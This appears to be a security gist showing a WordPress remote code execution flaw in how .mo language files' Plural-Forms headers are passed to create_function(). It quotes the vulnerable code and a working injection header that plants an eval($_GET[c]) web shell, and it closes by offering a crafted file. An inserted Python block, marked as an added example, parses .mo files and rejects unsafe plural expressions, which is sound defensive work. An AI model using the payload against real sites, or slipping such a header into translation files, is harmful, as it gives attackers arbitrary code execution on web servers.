Created Oct 8, 2016
WordPress RCE via specially crafted .mo language file

The vulnerable code in wp-includes/pomo/translations.php:

    function make_plural_form_function($nplurals, $expression) {
        // $expression comes from the Plural-Forms header of the .mo file
        $expression = str_replace('n', '$n', $expression);
        $func_body = "
            \$index = (int)($expression);
            return (\$index < $nplurals)? \$index : $nplurals - 1;";
        // create_function() evaluates $func_body as PHP source
        return create_function('$n', $func_body);
    }

PHP's create_function() internally calls zend_eval_stringl(), so an attacker can use } to close the anonymous function and execute arbitrary code while the anonymous function is being created :-)


Plural-Forms: nplurals=1; plural=n);}eval($_GET[c]);/*;
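
A defensive check for the header above, as an added example that is not part of the original gist or of WordPress: it reads the header entry out of a .mo file and rejects any Plural-Forms value that is more than `nplurals=N; plural=EXPR;` with EXPR built from `n`, digits and C operators. The function names, the character allow-list and the constructed benign sample file are assumptions of this example.

```python
import re
import struct

# Assumed allow-list: n, digits, whitespace and C operators are all a plural rule needs.
ALLOWED = re.compile(r"[n0-9\s()?:|&=!<>+\-*/%]+")
FORM = re.compile(r"^\s*nplurals\s*=\s*(\d+)\s*;\s*plural\s*=\s*([^;]*);?\s*$")

# Constructed sample: a one-entry little-endian .mo holding only a benign header.
_HDR = b"Plural-Forms: nplurals=2; plural=(n != 1);\n"
SAMPLE_MO = (struct.pack("<7I", 0x950412DE, 0, 1, 28, 36, 0, 0)
             + struct.pack("<4I", 0, 44, len(_HDR), 45) + b"\0" + _HDR + b"\0")

def mo_header(data: bytes) -> str:
    """Return the header entry (the translation of the empty msgid)."""
    end = {b"\xde\x12\x04\x95": "<", b"\x95\x04\x12\xde": ">"}.get(data[:4])
    if end is None:
        raise ValueError("not a gettext .mo file")
    _rev, count, orig_off, trans_off = struct.unpack_from(end + "4I", data, 4)
    for i in range(count):
        olen, _ooff = struct.unpack_from(end + "2I", data, orig_off + 8 * i)
        if olen == 0:  # the empty msgid marks the header entry
            tlen, toff = struct.unpack_from(end + "2I", data, trans_off + 8 * i)
            return data[toff:toff + tlen].decode("utf-8", "replace")
    return ""

def plural_forms_problems(header: str) -> list:
    """List the reasons a Plural-Forms line must not be turned into code."""
    problems = []
    for line in header.splitlines():
        name, _, value = line.partition(":")
        if name.strip().lower() != "plural-forms":
            continue
        m = FORM.match(value)
        if not m:  # extra statements after the expression end up here
            problems.append("not of the form 'nplurals=N; plural=EXPR;'")
            continue
        expr = m.group(2)
        if not ALLOWED.fullmatch(expr):
            problems.append("plural expression has characters outside the allow-list")
        depth = 0
        for ch in expr:
            depth += (ch == "(") - (ch == ")")
            if depth < 0:  # a ')' that closes nothing
                break
        if depth != 0:
            problems.append("unbalanced parentheses in plural expression")
    return problems
```

An empty list means the header passed; a truncated or malformed file raises `struct.error` or `ValueError` from `mo_header` and should be treated as a failed check.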

I provide a crafted .mo language file; you can set the default language to Chinese, then access the following URL and the phpinfo() function will be executed.


The crafted .mo language file: